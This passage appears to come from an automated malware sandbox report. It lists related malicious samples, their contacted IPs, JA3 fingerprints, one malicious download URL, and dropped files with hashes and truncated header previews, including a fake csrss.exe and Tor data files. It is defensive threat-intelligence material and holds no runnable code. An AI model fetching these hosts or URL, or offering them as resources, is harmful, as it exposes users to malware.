	PO_VCFGA1010.exe	Get hash	malicious	FormBook	Browse	74.208.236.181
	Purchase_order.exe	Get hash	malicious	FormBook, NSISDropper	Browse	74.208.236.78
	e-dekont_html.exe	Get hash	malicious	FormBook	Browse	217.160.0.118
	Dhl_Consignment_details_pdf.exe	Get hash	malicious	FormBook	Browse	74.208.236.243
	ORS51123MQ90EI.exe	Get hash	malicious	FormBook, GuLoader	Browse	74.208.236.111
	PAGAMENTO_INV-85732.exe	Get hash	malicious	FormBook, NSISDropper	Browse	217.160.0.27
	WtRLqa6ZXn.exe	Get hash	malicious	Unknown	Browse	212.227.17.162
	gunzipped.exe	Get hash	malicious	FormBook	Browse	74.208.236.243
	klWGq3yDcQ.exe	Get hash	malicious	Unknown	Browse	74.208.5.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	Unknown	Browse	104.21.79.229
	Installermonitorlek_dbg.exe	Get hash	malicious	Remcos	Browse	104.21.79.229
	DHL867888_factura_commerciale.pdf.js	Get hash	malicious	AgentTesla	Browse	104.21.79.229
	zx6GVwK8vI.exe	Get hash	malicious	LummaC Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	104.21.79.229
	Answer_Key_Engineer_B_Adhoc_December_2021.xlam.xlsx	Get hash	malicious	Unknown	Browse	104.21.79.229
	devolucion_separata_noviembre_corales.xlam.xlsx	Get hash	malicious	Unknown	Browse	104.21.79.229
	PO#1123.xlam.xlsx	Get hash	malicious	Unknown	Browse	104.21.79.229
	ExcelPlus.xlam.xlsx	Get hash	malicious	Unknown	Browse	104.21.79.229
	Order_18-670077.xls	Get hash	malicious	Unknown	Browse	104.21.79.229
	Quotation_File_pdf.vbs	Get hash	malicious	FormBook	Browse	104.21.79.229
	Proceso_juridico#0938774635334.vbs	Get hash	malicious	Unknown	Browse	104.21.79.229
	USD_21,900.Machine_Line_L.T.D..vbs	Get hash	malicious	XWorm	Browse	104.21.79.229
	Copy_of_ATR_JEFFERCY_C_CRAWFORD_TD.xls	Get hash	malicious	Unknown	Browse	104.21.79.229
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	104.21.79.229
	Empty_compare.xlsx	Get hash	malicious	Unknown	Browse	104.21.79.229
	app-version.exe	Get hash	malicious	Unknown	Browse	104.21.79.229
	app-version.exe	Get hash	malicious	Unknown	Browse	104.21.79.229
	file.exe	Get hash	malicious	BitCoin Miner, RedLine, SmokeLoader, Socks5Systemz	Browse	104.21.79.229
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	104.21.79.229
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	104.21.79.229
83d60721ecc423892660e275acc4dffd	klWGq3yDcQ.exe	Get hash	malicious	Unknown	Browse	198.50.191.95
	file.exe	Get hash	malicious	Unknown	Browse	198.50.191.95
	file.exe	Get hash	malicious	Unknown	Browse	198.50.191.95
	g5oo6DQ4pd.exe	Get hash	malicious	Unknown	Browse	198.50.191.95
	index	Get hash	malicious	Unknown	Browse	198.50.191.95
	malware.exe	Get hash	malicious	Unknown	Browse	198.50.191.95
	reverseshell.exe	Get hash	malicious	Unknown	Browse	198.50.191.95
	4hy2wIO57k.exe	Get hash	malicious	Unknown	Browse	198.50.191.95
	file.exe	Get hash	malicious	Unknown	Browse	198.50.191.95
	Uv4KrQL2Rt.exe	Get hash	malicious	Unknown	Browse	198.50.191.95
	THtPIwSCb7.exe	Get hash	malicious	Unknown	Browse	198.50.191.95
	tinynuke.exe	Get hash	malicious	Tinynuke / Nukebot	Browse	198.50.191.95
	WLm4U77a8q.dll	Get hash	malicious	DanaBot	Browse	198.50.191.95
	VCJQWUG1iY.exe	Get hash	malicious	Unknown	Browse	198.50.191.95
	ejHZ3HUs6E.exe	Get hash	malicious	AsyncRAT BitCoin Miner	Browse	198.50.191.95
	start.exe	Get hash	malicious	BitCoin Miner	Browse	198.50.191.95
	masikerogocyqu.exe.exe	Get hash	malicious	Unknown	Browse	198.50.191.95
	004.exe	Get hash	malicious	Unknown	Browse	198.50.191.95
	http://afb05.download.thesongwritercollection.com/factuur_12_02_2019_6torc8jm67f9e87tnmy.zip	Get hash	malicious	Unknown	Browse	198.50.191.95

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\38B4.exe	file.exe	Get hash	malicious	BitCoin Miner, RedLine, SmokeLoader, Socks5Systemz	Browse
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	BitCoin Miner, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	BitCoin Miner, RedLine, SmokeLoader	Browse
C:\Users\user\AppData\Local\Temp\32.exe	file.exe	Get hash	malicious	BitCoin Miner, RedLine, SmokeLoader, Socks5Systemz	Browse
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	BitCoin Miner, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	BitCoin Miner, RedLine, SmokeLoader	Browse

Created / dropped Files

(copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\50E3.exe
File Type:	ASCII text, with very long lines (375), with CRLF line terminators
Category:	dropped
Size (bytes):	5210
Entropy (8bit):	5.274879973149966
Encrypted:	false
SSDEEP:	96:Fr/NrbpXgYX9c9h5ZAIGxBu73VDQmf/VvLN:lCAHmX5
MD5:	324FD4A3BA1C49C80DC4CBF9BCBAC2A4
SHA1:	FBA33AC0971CACE1995D653028CE2C239DDA0989
SHA-256:	5DE61BCC4FE94CDDA69785C4273CA60B6D2B4FEAD18867CDAA12475522458178
SHA-512:	17F77903005B55C2B2977E6D6D9D04BF2CBF2B4F1AF701A23FE3E708D2147CE865329C53C615865619743582DFAA5D7B4E0037D8DBA65E9E7B316A400A7FF61E
Malicious:	false
Preview:	# Tor state file last generated on 2023-11-30 11:36:44 local time..# Other times below are in UTC..# You do not need to edit this file.....CircuitBuildTimeBin 775 2..CircuitBuildTimeBin 925 1..CircuitBuildTimeBin 975 2..CircuitBuildTimeBin 1025 1..CircuitBuildTimeBin 1125 2..CircuitBuildTimeBin 1175 1..CircuitBuildTimeBin 1225 1..CircuitBuildTimeBin 1275 3..CircuitBuildTimeBin 1375 1..CircuitBuildTimeBin 1525 1..CircuitBuildTimeBin 1575 1..CircuitBuildTimeBin 1675 1..CircuitBuildTimeBin 1725 2..CircuitBuildTimeBin 1775 1..CircuitBuildTimeBin 2025 1..CircuitBuildTimeBin 2425 1..CircuitBuildTimeBin 2625 1..CircuitBuildTimeBin 3075 1..CircuitBuildTimeBin 3525 1..CircuitBuildTimeBin 3925 2..CircuitBuildTimeBin 4325 1..CircuitBuildTimeBin 5025 1..CircuitBuildTimeBin 6375 1..CircuitBuildTimeBin 15975 1..CircuitBuildTimeBin 16075 1..CircuitBuildTimeBin 16175 1..CircuitBuildTimeBin 16225 1..CircuitBuildTimeBin 16375 2..CircuitBuildTimeBin 16625 1..CircuitBuildTimeBin 16675 2..CircuitBuildTim

C:\ProgramData\Drivers\csrss.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\50E3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1965056
Entropy (8bit):	7.936234261363858
Encrypted:	false
SSDEEP:	49152:Vbe6aahW7iaBUHvG+vxz90ChL0WF+UIGDDS/NL:vaaA7iYb+dtQWFZvSR
MD5:	1457EF90EFDE49A7EE83080CE051D6F7
SHA1:	8CA6D983FE2997FA7009458383B84E0D1EDEB279
SHA-256:	9BB0954A71EDFD122A5E2B14850702A453FDBF5A632265337C0AEE558BDD3E40
SHA-512:	582628E02510812E0ED06CC05A1BFB98E96F019935EFB71D23DD94745A0C5DB12771BF0C81579DD7AD4F44B90E7192B95D5D2ED4A6649ADC00B486C28DF643D0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L......d.................H...p9.............`....@...........................V.....;R......................................<L..<.... V..b...........................................................D..@............................................text... G.......H.................. ..`.data...`.8..`...L...L..............@....rsrc....b... V..d..................@..@................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4A1B.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\4A1B.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3094
Entropy (8bit):	5.33145931749415
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
MD5:	3FD5C0634443FB2EF2796B9636159CB6
SHA1:	366DDE94AEFCFFFAB8E03AD8B448E05D7489EB48
SHA-256:	58307E94C67E2348F5A838DE4FF668983B38B7E9A3B1D61535D3A392814A57D6
SHA-512:	8535E7C0777C6B0876936D84BDE2BDC59963CF0954D4E50D65808E6E806E8B131DF5DB8FA0E030FAE2702143A7C3A70698A2B9A80519C9E2FFC286A71F0B797C
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3094
Entropy (8bit):	5.33145931749415
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
MD5:	3FD5C0634443FB2EF2796B9636159CB6
SHA1:	366DDE94AEFCFFFAB8E03AD8B448E05D7489EB48
SHA-256:	58307E94C67E2348F5A838DE4FF668983B38B7E9A3B1D61535D3A392814A57D6
SHA-512:	8535E7C0777C6B0876936D84BDE2BDC59963CF0954D4E50D65808E6E806E8B131DF5DB8FA0E030FAE2702143A7C3A70698A2B9A80519C9E2FFC286A71F0B797C
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1019
Entropy (8bit):	5.236946495216897
Encrypted:	false
SSDEEP:	24:YqHZ6T06Mhm4ymNib0O0bihmCetmKg6CUXyhmimKgbxdB6hmjmKgz0JahmcmKgbR:YqHZ6T06McoEb0O0bicCewHDUXycLHbR
MD5:	5D20D9B3F928AC964E07C561FD8A3F42
SHA1:	B702BE149FCF94831A975F2CD06B2DFE020D9632
SHA-256:	59A4F22870D7A7DC3339917C89FF6AF09FA762AF39F0624338FDDFF631730492
SHA-512:	30E5F275FFB475A403439C3A4DCC05F3E12A6914D93F20EB38AF3240A7F693A455C25C005A3681AB39C89BFAD9AE66FAAE3874B987FAC48BB6A5439194FDCEDC
Malicious:	false
Preview:	{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":7763552,"LastSwitchedHighPart":31061488,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":4292730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4282730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4272730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4262730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4252730848,"LastSwitchedHighPart":31061487,"Pr

C:\Users\user\AppData\Local\Temp\32.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\CL_Debug_Log.txt
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7728640
Entropy (8bit):	7.957264624545612
Encrypted:	false
SSDEEP:	196608:RCKb/3kANRAdr5aoWlsuoEqz2ngKSnBuLz9lJ:wqsdVAMQSO9
MD5:	0F6C2CBED733BD4DC9A5E21D2611CD0F
SHA1:	02748EF02582B2B282451EC6F47791D4F7B3BB65
SHA-256:	36FC0432ECBBBA57C6A04B2D0A1F2E37FC25D292CD16E8F3A1CB9D2FA810AF04
SHA-512:	9520B955252D9E59AD8C85535E3D0134C4F2249B76C14917713CD131F1F9C92BA22AF3C278853BB113F7C9F88D7C06D7F85A8ACB586E4F8FF0D31D03E9753703
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 43%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L.....ge.........."...........m...................@..........................Pv......8v...@...@.......@.........................\|.......hFi...................u.4q...+..............................PK..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...hFi......Hi..4..............@..@.reloc..4q....u..r...\|u.............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\38B4.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	16709120
Entropy (8bit):	7.98839424071433
Encrypted:	false
SSDEEP:	393216:kIGjY9luLMWNVAgidNUDUDeElrCakFLrffXZh5:JGj4lu4WfAgSUDYrCRFvN
MD5:	D4E64AB0FF97F98EE52336A12F8A866B
SHA1:	142DBAB8C142028DEE1246406F00D78EE996A928
SHA-256:	DDF5992A22E591CAE17174A449440242CA2D202F54C075595E3C2424A37A89BC
SHA-512:	2930DE9B2FFCA5225D94D24029FDD2CBFC1D71602AFF4D85DDBB6D0D54121E6DA5D48C773B152753A67EF9E2D97E63D867955024BD5587E7FED7339E3BECE7E0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L.....ge.........."...............................@..........................P.......R....@...@.......@.........................\|.......TO......................4q...+..............................PK..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...TO.......P...4..............@..@.reloc..4q.......r..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\41CD.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	411424
Entropy (8bit):	6.7246810991045285
Encrypted:	false
SSDEEP:	6144:nmG03zFVHcinxvGLMBCnEAOY9yoCtYbatVD9Jrm78ydXKJusPqMy/pE:k3xV86bdtYbatVDnm78ydXKJT1y/pE
MD5:	1213B099D1578505C431AD2BE2137F96
SHA1:	5FAFAAB091510C4881F5ACE3C5DF90E27D3D47EB
SHA-256:	265ADC995326BB9282987036FA5F6B59F6D08B53C0E7ED2A4EE5A4C22DBCC2EF
SHA-512:	FF0251A3007515C6C6E600800BE6612CDC4E54CFC143C1D327EB06653B44F41E4D11BE454F283ABCA8A9DC710DE6513FD2F24CEF3DE8A91334DDDDF95072F8AB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 49%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!..le.?e.?e.?...>h.?...>..?...>s.?..>t.?..>p.?...>`.?e.?..?*..>6.?...>d.?...>d.?Riche.?........PE..L....9ge...............".....z......!Q............@..........................P............@.................................\|...<....................,.. ....0......Pz...............................y..@...............L............................text...O........................... ..`.rdata..............................@..@.data...(...........................@....BSs.....n.......p..................@....reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4A1B.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2618520
Entropy (8bit):	7.959981883529953
Encrypted:	false
SSDEEP:	49152:F6bFpLtNAQU19YU4IDHXntG/xNZx4gURL1G9lwN4cTWRSuaNOmEEfNoI0D:Cg6FGHXntyaRSle4Tw14UuI0D
MD5:	FBCBD8CF00AE50409FBB729F3303A84C
SHA1:	E26018EDF9E69A017634BA1EAD0FBD220DD3D5DC
SHA-256:	285D5887C32C7026BBA1462009D4AA7CD330A530B2E56D566A3E7903525FF93E
SHA-512:	DEF2141C7BBE4CF79CDA8280BC88558F4A0D57BD12D96A6ED0FF0FE04F5FAE7D2F40301E5ABF0E5AD5C8FC729665C6F9213E766A6B63B9EBCD5C0809193DB2EB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 51%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....64...............0.............H._.. ........@.. ...............................N(...@.................................:...P.....................'............................................................................................. ..... ...................... ..` 7........R..................@..@ .............l..............@..B.idata... ...........n..............@....rsrc.... ...........p..............@..@.themida..Z.........................`....boot....X&..._..X&.................`..`........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-certs.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\50E3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	20852
Entropy (8bit):	6.051534614948206
Encrypted:	false
SSDEEP:	384:cMY4QkV6icO1hMtqc2q48XVd91hMBaU4XVy41h9Yyd4AW9V9hC1hIhyd24ZFtVfb:6BkoicOaq8nX9832xiyrqvUg62M1uxHm
MD5:	26C504C20C23FA938541BFCC9D48D9EB
SHA1:	D204846E3437A963DAB77621661B00659356CC24
SHA-256:	7F4913F75FF4705B40749A223E14CE6BE56469A832E3627A80CBC3FC9BDFE398
SHA-512:	EABDC25BD03832271BA8BC67F2802290FF63883D0C448AF51886E0991EB920CB2D210D8BB5DD04F5BC0A1F5E72495E24D8218D518177E97864B9EC008927A3B1
Malicious:	false
Preview:	dir-key-certificate-version 3..fingerprint 0232AF901C31A04EE9848595AF9BB7620D4C5B2E..dir-key-published 2023-05-17 14:30:40..dir-key-expires 2024-05-17 14:30:40..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAu9O0Pueesn0+29BlxZs60mBqehjdQtgSnKOm9QZxbQ0xrMQgbFnR..hWbKD8erenyeFk2SF6AJkbyzgYC89hyPW+8GBDmg5bE8fRKjgV/nI3tY2m4rkY3u..zSmYIdwqHUUc98Xzt9PaQ8IJAlDBY4XLKrWmJMxSyhBlVEept7+9Tj23qowW44Mz..xPJZ1aFkB1FpkD6qmoCzVZbhXy3cGt1nDwdJK7KqlaXziz9pFiw8PzTVU2xFgJNy..+nEcT72DBtk3G5K2Riu/aXY/D541Cioj9KMV4Nv4g8aBKx58Xq2tq1pFkc1Bqj1y..2MomVR3iskFzlqC8yKWGVe4OP2IaOhtcQJYp5GR9q+dWnr53WWNVxNu3sA9iMal3..PJUk5pIYrsmArGew5gmlCe+Al46nPINxc7ouztmStAV+2F6SpZlKOcstnT+KJ52O..1xnOSaj/WnzG2o4KZ9UrFQoUNOLQJcelPcC+vrinMk9BQPcB072l9NjpUBC9brsW..qTCMStn1jfDDAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAvIW/KEA4eoi2rkD6vDKcLu2+2DY5K3pd9P5edSvQ8mBY21CeUfhY..WI+XWr1K9U5/yNsJS8YCvGEtvNK+yEnHkBKLItvi6ibv6W8nP5l4sLhooJBaPm7v..FDhtbnp6HTMbSnBXTxT2gaSPJ+p9

C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-microdesc-consensus.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\50E3.exe
File Type:	ASCII text, with very long lines (1006)
Category:	dropped
Size (bytes):	2772448
Entropy (8bit):	5.617662677142841
Encrypted:	false
SSDEEP:	12288:nMquHGVT0PqgmUzCaVIdPclGx04jQv70GZOL+cIbWdXGD5WA2UpglWy:ntuH25Sza4GxNQ0pL7r2DClWy
MD5:	6AAF86E0E44F63AA68A2C7EF8A50852B
SHA1:	A2EFA1DC4317172BB87E6A1D40CDF8CD19ACEE65
SHA-256:	1B86732EAB19C46FB6C7F7FAD5C690152EE5064EB8B1AC6730FEB1956090F920
SHA-512:	805069D82E2A810BD9F20D9BCBB6FCBBEF3D6CB660E258423454C394A9B7BBBCD33B2A2F0AA1C496540FE7B8718480FFB41088D2B3AA494E2DA8DD9D939C2F42
Malicious:	false
Preview:	network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2023-11-30 10:00:00.fresh-until 2023-11-30 11:00:00.valid-until 2023-11-30 13:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols

C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-microdescs.new

Download File

Process:	C:\Users\user\AppData\Local\Temp\50E3.exe
File Type:	ASCII text, with very long lines (6852)
Category:	modified
Size (bytes):	21440126
Entropy (8bit):	4.817495065459138
Encrypted:	false
SSDEEP:	24576:zrPNRj/6NwcwxJT3eLz8bYayNoC3744bD88euzUzHe56Lkgozxe9wOk+5FajFObR:79Jnbqz94hA6cbHpCz/p6AFtx3
MD5:	FFCA0F601BC1FAF841594E6B5B3150E6
SHA1:	1EF5CBD569C1A61C909D72AB0841F11009607060
SHA-256:	FE2D614485BF3028906AC52FED05033A6FDA6959EC68D10BA31D3C2B573E80FA
SHA-512:	275736BD45A3EB52BFEAF56E6155AB15C26B937A04BB386D5C02B097A1155DF94570AC34B9A61185B0B9B47194F5EBFBE675209E2031C387756D79B325E4E48E
Malicious:	false
Preview:	@last-listed 2023-11-30 10:20:13.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAN9xFP8fQGxfbNLLFH6NnM7F9W+hIkgRYS93vKkNm54ZjtCInPI+dk2c.R6iItXTwwmflhSVU1gtVwcBM8LgB5pO2ggNYcrpayOWtFILlsgy1P36VPZcvx1dA.tDqREKCLehIGy68tv/Em+wgO1Z2MEA++DM5dfXc7bBjSSVriwt0PAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key kNCMfbqCWOHcdogSoFQsI8nf2hw6+KS++4H3X+zVEwo.id ed25519 9aipah5PLCR1rRHBkzYyOGoqO7x7ChXRBSfrX5hJ41M.@last-listed 2023-11-30 10:20:13.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAPDelyf4EMZg8Cju0FyHA1/W3Cuwq2G1nZkgZ8gFt/6dksekk/E8+uib.R/SEPLh8ZQWAW8AwN7ecqPLeXZH0ijvo6yOV2TSeYi1VvkG08FFsHtHbW+prIbLT.5ao1STdMAzP5Q2o6hT6MZRnAVaagPLHkbQeENZHQJ1tVH2HTRmXxAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key x62MetQdra9sCUxth+pvZTMhidsa7Q+nryPW+pqf12c.p reject 25.p6 reject 25.id ed25519 +gzcnBkAf0zt2OWmZ7HjmW6EKh5oqfXsqExSaj46ZJ8.@last-listed 2023-11-30 10:20:13.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBALL8ACjdwgvgjWESda9pRpIYTl+TBHbOzasVoZ+nMGSw+u8+D+MtIJX+.87AECryoGtS7j5jHonHQ

C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\state.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\50E3.exe
File Type:	ASCII text, with very long lines (375), with CRLF line terminators
Category:	dropped
Size (bytes):	5210
Entropy (8bit):	5.274879973149966
Encrypted:	false
SSDEEP:	96:Fr/NrbpXgYX9c9h5ZAIGxBu73VDQmf/VvLN:lCAHmX5
MD5:	324FD4A3BA1C49C80DC4CBF9BCBAC2A4
SHA1:	FBA33AC0971CACE1995D653028CE2C239DDA0989
SHA-256:	5DE61BCC4FE94CDDA69785C4273CA60B6D2B4FEAD18867CDAA12475522458178
SHA-512:	17F77903005B55C2B2977E6D6D9D04BF2CBF2B4F1AF701A23FE3E708D2147CE865329C53C615865619743582DFAA5D7B4E0037D8DBA65E9E7B316A400A7FF61E
Malicious:	false
